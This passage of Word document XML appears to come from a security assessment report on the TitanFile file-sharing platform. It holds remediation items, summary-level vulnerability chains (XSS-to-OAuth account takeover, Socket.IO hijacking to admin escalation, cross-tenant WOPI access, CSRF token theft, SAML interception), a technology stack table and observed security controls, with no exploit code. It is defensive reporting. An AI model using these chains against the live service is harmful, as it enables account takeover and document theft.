            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Short-term</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5760"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Audit all TitanFile.alert() calls with html:true</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-1021 — https://cwe.mitre.org/data/definitions/1021.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CWE-352: CSRF — https://cwe.mitre.org/data/definitions/352.html</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:t>CSP bypass techniques — https://book.hacktricks.xyz/pentesting-web/content-security-policy-csp-bypass</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>5. Vulnerability Chains</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:t>The following illustrates how individual vulnerabilities chain together:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Chain 1: Full Account Takeover (CVSS 9.3)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>VULN-013 (Previewer XSS)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → VULN-005 (unsafe-inline CSP allows execution)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → VULN-003 (OAuth redirect to attacker subdomain)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → OAuth code stolen → ACCOUNT TAKEOVER</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Chain 2: Admin Privilege Escalation (CVSS 9.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>VULN-002 (Unauthenticated Socket.IO + SameSite=None cookie)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → CSWSH from attacker page</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → VULN-014 (permissions:update_perm_cache overwrite)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → ADMIN ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Chain 3: Cross-Tenant Document Access (CVSS 8.1)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>VULN-011 (Source code reveals file ID format: fr_&lt;uuid&gt;)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → VULN-004 (WOPI getAccessToken with arbitrary UUID)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → VIEW/EDIT ANY DOCUMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Chain 4: CSRF Token Theft (CVSS 7.8)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>VULN-010 (Unescaped error messages → HTML injection)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → VULN-006 (form-action * allows cross-origin submit)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → CSRF token exfiltrated → PERFORM ACTIONS AS VICTIM</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Chain 5: SAML Authentication Bypass (CVSS 7.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="283"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="17"/>
          <w:shd w:fill="f0f0f0" w:val="clear"/>
        </w:rPr>
        <w:t>VULN-012 (SAML metadata on any subdomain)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → VULN-007 (Unsigned AuthnRequests + wildcard ACS URL)</w:t>
        <w:br/>
        <w:t xml:space="preserve">  → INTERCEPT SAML ASSERTIONS</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>6.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1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Detail</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backend Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Django (Python)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Admin at /admin/login/</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Frontend Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Backbone.js + Marionette.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Legacy, EOL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Newer Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>React</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>.tsx files for settings, MS365</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Real-time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Socket.IO</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>EIO=4 protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cloud Infrastructure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AWS (ALB, S3, CloudFront)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ca-central-1, us-east-1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cloud Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>AWS S3 + Azure Blob Storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Multiple regions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Django Auth + SAML 2.0 + Google OAuth2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Multi-protocol</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Payments</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Stripe + Zuora</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Analytics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pendo + Google Tag Manager</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Integrations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MS365 WOPI, DocuSign, NetDocs, Credeon CSE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TLS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TLS 1.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>TLS_AES_256_GCM_SHA384</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>CSS/UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Font Awesome 4.3.0, jQuery UI 1.9.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3120"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>~11-14 years old</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>7. Appendices</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Appendix A — Good Security Practices Observed</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="1a1a2e" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Status</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>HSTS with includeSubdomains (1-year max-age)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>X-Frame-Options: DENY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>X-Content-Type-Options: nosniff</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Referrer-Policy: strict-origin-when-cross-origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cross-Origin-Opener-Policy: same-origin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:fill="f5f5f5" w:val="clear"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Implemented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
